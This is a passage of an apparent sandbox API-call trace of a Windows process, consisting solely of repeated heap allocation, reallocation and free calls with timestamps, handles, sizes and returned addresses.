0x4f708d8 [0061.024] GetProcessHeap () returned 0x4f10000 [0061.024] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.024] GetProcessHeap () returned 0x4f10000 [0061.025] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.025] GetProcessHeap () returned 0x4f10000 [0061.025] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.025] GetProcessHeap () returned 0x4f10000 [0061.025] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.025] GetProcessHeap () returned 0x4f10000 [0061.025] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.025] GetProcessHeap () returned 0x4f10000 [0061.025] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.025] GetProcessHeap () returned 0x4f10000 [0061.025] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.025] GetProcessHeap () returned 0x4f10000 [0061.025] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.025] GetProcessHeap () returned 0x4f10000 [0061.025] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.025] GetProcessHeap () returned 0x4f10000 [0061.025] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.025] GetProcessHeap () returned 0x4f10000 [0061.025] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.025] GetProcessHeap () returned 0x4f10000 [0061.025] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.025] GetProcessHeap () returned 0x4f10000 [0061.025] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.025] GetProcessHeap () returned 0x4f10000 [0061.025] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.025] GetProcessHeap () returned 0x4f10000 [0061.025] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.025] GetProcessHeap () returned 0x4f10000 [0061.025] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.025] GetProcessHeap () returned 0x4f10000 [0061.025] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.025] GetProcessHeap () returned 0x4f10000 [0061.025] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.025] GetProcessHeap () returned 0x4f10000 [0061.025] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.025] GetProcessHeap () returned 0x4f10000 [0061.025] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.025] GetProcessHeap () returned 0x4f10000 [0061.025] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.025] GetProcessHeap () returned 0x4f10000 [0061.026] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.026] GetProcessHeap () returned 0x4f10000 [0061.026] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.026] GetProcessHeap () returned 0x4f10000 [0061.026] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.026] GetProcessHeap () returned 0x4f10000 [0061.026] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.026] GetProcessHeap () returned 0x4f10000 [0061.026] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.026] GetProcessHeap () returned 0x4f10000 [0061.026] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.026] GetProcessHeap () returned 0x4f10000 [0061.026] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.026] GetProcessHeap () returned 0x4f10000 [0061.026] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.026] GetProcessHeap () returned 0x4f10000 [0061.026] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.026] GetProcessHeap () returned 0x4f10000 [0061.026] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.026] GetProcessHeap () returned 0x4f10000 [0061.026] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.026] GetProcessHeap () returned 0x4f10000 [0061.026] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.026] GetProcessHeap () returned 0x4f10000 [0061.026] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.026] GetProcessHeap () returned 0x4f10000 [0061.026] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.026] GetProcessHeap () returned 0x4f10000 [0061.026] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.026] GetProcessHeap () returned 0x4f10000 [0061.026] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.026] GetProcessHeap () returned 0x4f10000 [0061.026] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.026] GetProcessHeap () returned 0x4f10000 [0061.026] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.026] GetProcessHeap () returned 0x4f10000 [0061.026] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.026] GetProcessHeap () returned 0x4f10000 [0061.027] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.027] GetProcessHeap () returned 0x4f10000 [0061.027] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.027] GetProcessHeap () returned 0x4f10000 [0061.027] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.027] GetProcessHeap () returned 0x4f10000 [0061.027] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.027] GetProcessHeap () returned 0x4f10000 [0061.027] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.027] GetProcessHeap () returned 0x4f10000 [0061.027] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.027] GetProcessHeap () returned 0x4f10000 [0061.027] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.027] GetProcessHeap () returned 0x4f10000 [0061.027] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.027] GetProcessHeap () returned 0x4f10000 [0061.027] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.027] GetProcessHeap () returned 0x4f10000 [0061.027] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.027] GetProcessHeap () returned 0x4f10000 [0061.027] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.027] GetProcessHeap () returned 0x4f10000 [0061.027] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.027] GetProcessHeap () returned 0x4f10000 [0061.027] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.027] GetProcessHeap () returned 0x4f10000 [0061.027] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.027] GetProcessHeap () returned 0x4f10000 [0061.027] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.027] GetProcessHeap () returned 0x4f10000 [0061.027] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.027] GetProcessHeap () returned 0x4f10000 [0061.027] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.027] GetProcessHeap () returned 0x4f10000 [0061.027] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.027] GetProcessHeap () returned 0x4f10000 [0061.027] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.027] GetProcessHeap () returned 0x4f10000 [0061.028] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.028] GetProcessHeap () returned 0x4f10000 [0061.028] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.028] GetProcessHeap () returned 0x4f10000 [0061.028] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.028] GetProcessHeap () returned 0x4f10000 [0061.028] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.028] GetProcessHeap () returned 0x4f10000 [0061.028] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.028] GetProcessHeap () returned 0x4f10000 [0061.028] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.028] GetProcessHeap () returned 0x4f10000 [0061.028] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.028] GetProcessHeap () returned 0x4f10000 [0061.028] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.028] GetProcessHeap () returned 0x4f10000 [0061.028] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.028] GetProcessHeap () returned 0x4f10000 [0061.028] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.028] GetProcessHeap () returned 0x4f10000 [0061.028] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.028] GetProcessHeap () returned 0x4f10000 [0061.028] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.028] GetProcessHeap () returned 0x4f10000 [0061.028] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.028] GetProcessHeap () returned 0x4f10000 [0061.028] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.028] GetProcessHeap () returned 0x4f10000 [0061.028] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.028] GetProcessHeap () returned 0x4f10000 [0061.028] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.028] GetProcessHeap () returned 0x4f10000 [0061.028] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.028] GetProcessHeap () returned 0x4f10000 [0061.028] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.028] GetProcessHeap () returned 0x4f10000 [0061.028] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.028] GetProcessHeap () returned 0x4f10000 [0061.028] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.028] GetProcessHeap () returned 0x4f10000 [0061.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.029] GetProcessHeap () returned 0x4f10000 [0061.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.029] GetProcessHeap () returned 0x4f10000 [0061.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.029] GetProcessHeap () returned 0x4f10000 [0061.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.029] GetProcessHeap () returned 0x4f10000 [0061.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.029] GetProcessHeap () returned 0x4f10000 [0061.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.029] GetProcessHeap () returned 0x4f10000 [0061.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.029] GetProcessHeap () returned 0x4f10000 [0061.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.029] GetProcessHeap () returned 0x4f10000 [0061.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.029] GetProcessHeap () returned 0x4f10000 [0061.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.029] GetProcessHeap () returned 0x4f10000 [0061.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.029] GetProcessHeap () returned 0x4f10000 [0061.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.029] GetProcessHeap () returned 0x4f10000 [0061.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.029] GetProcessHeap () returned 0x4f10000 [0061.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.029] GetProcessHeap () returned 0x4f10000 [0061.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.029] GetProcessHeap () returned 0x4f10000 [0061.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.029] GetProcessHeap () returned 0x4f10000 [0061.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.029] GetProcessHeap () returned 0x4f10000 [0061.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.029] GetProcessHeap () returned 0x4f10000 [0061.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.029] GetProcessHeap () returned 0x4f10000 [0061.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.030] GetProcessHeap () returned 0x4f10000 [0061.030] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.030] GetProcessHeap () returned 0x4f10000 [0061.030] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.030] GetProcessHeap () returned 0x4f10000 [0061.030] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.030] GetProcessHeap () returned 0x4f10000 [0061.030] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.030] GetProcessHeap () returned 0x4f10000 [0061.030] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.030] GetProcessHeap () returned 0x4f10000 [0061.030] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.030] GetProcessHeap () returned 0x4f10000 [0061.030] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.030] GetProcessHeap () returned 0x4f10000 [0061.030] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.030] GetProcessHeap () returned 0x4f10000 [0061.030] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.030] GetProcessHeap () returned 0x4f10000 [0061.030] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.030] GetProcessHeap () returned 0x4f10000 [0061.030] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.030] GetProcessHeap () returned 0x4f10000 [0061.030] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.031] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12238, Size=0x84) returned 0x4f7f8a8 [0061.031] GetProcessHeap () returned 0x4f10000 [0061.031] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12238 [0061.031] GetProcessHeap () returned 0x4f10000 [0061.031] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12218 [0061.031] GetProcessHeap () returned 0x4f10000 [0061.031] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12228 [0061.031] GetProcessHeap () returned 0x4f10000 [0061.031] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12218 | out: hHeap=0x4f10000) returned 1 [0061.031] GetProcessHeap () returned 0x4f10000 [0061.031] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12218 [0061.031] GetProcessHeap () returned 0x4f10000 [0061.031] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12228 | out: hHeap=0x4f10000) returned 1 [0061.031] GetProcessHeap () returned 0x4f10000 [0061.031] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12228 [0061.031] GetProcessHeap () returned 0x4f10000 [0061.031] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12218 | out: hHeap=0x4f10000) returned 1 [0061.031] GetProcessHeap () returned 0x4f10000 [0061.031] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12218 [0061.031] GetProcessHeap () returned 0x4f10000 [0061.031] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12228 | out: hHeap=0x4f10000) returned 1 [0061.031] GetProcessHeap () returned 0x4f10000 [0061.031] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12228 [0061.031] GetProcessHeap () returned 0x4f10000 [0061.031] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12218 | out: hHeap=0x4f10000) returned 1 [0061.031] GetProcessHeap () returned 0x4f10000 [0061.031] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12218 [0061.031] GetProcessHeap () returned 0x4f10000 [0061.031] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12228 | out: hHeap=0x4f10000) returned 1 [0061.031] GetProcessHeap () returned 0x4f10000 [0061.031] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12228 [0061.031] GetProcessHeap () returned 0x4f10000 [0061.031] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12218 | out: hHeap=0x4f10000) returned 1 [0061.031] GetProcessHeap () returned 0x4f10000 [0061.031] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12218 [0061.031] GetProcessHeap () returned 0x4f10000 [0061.031] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12228 | out: hHeap=0x4f10000) returned 1 [0061.031] GetProcessHeap () returned 0x4f10000 [0061.032] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12228 [0061.032] GetProcessHeap () returned 0x4f10000 [0061.032] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12218 | out: hHeap=0x4f10000) returned 1 [0061.032] GetProcessHeap () returned 0x4f10000 [0061.032] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12218 [0061.032] GetProcessHeap () returned 0x4f10000 [0061.032] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12228 | out: hHeap=0x4f10000) returned 1 [0061.032] GetProcessHeap () returned 0x4f10000 [0061.032] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0xc) returned 0x7cf4648 [0061.032] GetProcessHeap () returned 0x4f10000 [0061.032] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12218 | out: hHeap=0x4f10000) returned 1 [0061.032] GetProcessHeap () returned 0x4f10000 [0061.032] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x10) returned 0x7cf4618 [0061.032] GetProcessHeap () returned 0x4f10000 [0061.032] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf4648 | out: hHeap=0x4f10000) returned 1 [0061.032] GetProcessHeap () returned 0x4f10000 [0061.032] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d49a28 [0061.032] GetProcessHeap () returned 0x4f10000 [0061.032] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf4618 | out: hHeap=0x4f10000) returned 1 [0061.032] GetProcessHeap () returned 0x4f10000 [0061.032] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x38) returned 0x7d36500 [0061.032] GetProcessHeap () returned 0x4f10000 [0061.032] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d49a28 | out: hHeap=0x4f10000) returned 1 [0061.032] GetProcessHeap () returned 0x4f10000 [0061.032] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x70) returned 0x7ce6108 [0061.032] GetProcessHeap () returned 0x4f10000 [0061.032] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d36500 | out: hHeap=0x4f10000) returned 1 [0061.032] GetProcessHeap () returned 0x4f10000 [0061.032] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x74) returned 0x4f75cb0 [0061.032] GetProcessHeap () returned 0x4f10000 [0061.032] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7ce6108 | out: hHeap=0x4f10000) returned 1 [0061.032] GetProcessHeap () returned 0x4f10000 [0061.032] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0xe0) returned 0x7d3f5c8 [0061.032] GetProcessHeap () returned 0x4f10000 [0061.032] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f75cb0 | out: hHeap=0x4f10000) returned 1 [0061.032] GetProcessHeap () returned 0x4f10000 [0061.032] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0061.032] GetProcessHeap () returned 0x4f10000 [0061.032] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d3f5c8 | out: hHeap=0x4f10000) returned 1 [0061.033] GetProcessHeap () returned 0x4f10000 [0061.033] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.033] GetProcessHeap () returned 0x4f10000 [0061.033] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0061.033] GetProcessHeap () returned 0x4f10000 [0061.033] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0061.033] GetProcessHeap () returned 0x4f10000 [0061.033] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.033] GetProcessHeap () returned 0x4f10000 [0061.033] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.033] GetProcessHeap () returned 0x4f10000 [0061.033] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0061.033] GetProcessHeap () returned 0x4f10000 [0061.033] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0061.033] GetProcessHeap () returned 0x4f10000 [0061.033] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.033] GetProcessHeap () returned 0x4f10000 [0061.033] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.033] GetProcessHeap () returned 0x4f10000 [0061.033] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0061.033] GetProcessHeap () returned 0x4f10000 [0061.033] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0061.033] GetProcessHeap () returned 0x4f10000 [0061.033] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.033] GetProcessHeap () returned 0x4f10000 [0061.033] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.033] GetProcessHeap () returned 0x4f10000 [0061.033] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0061.033] GetProcessHeap () returned 0x4f10000 [0061.033] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0061.033] GetProcessHeap () returned 0x4f10000 [0061.033] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.033] GetProcessHeap () returned 0x4f10000 [0061.033] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0061.033] GetProcessHeap () returned 0x4f10000 [0061.033] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0061.033] GetProcessHeap () returned 0x4f10000 [0061.034] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0061.034] GetProcessHeap () returned 0x4f10000 [0061.034] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0061.034] GetProcessHeap () returned 0x4f10000 [0061.034] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 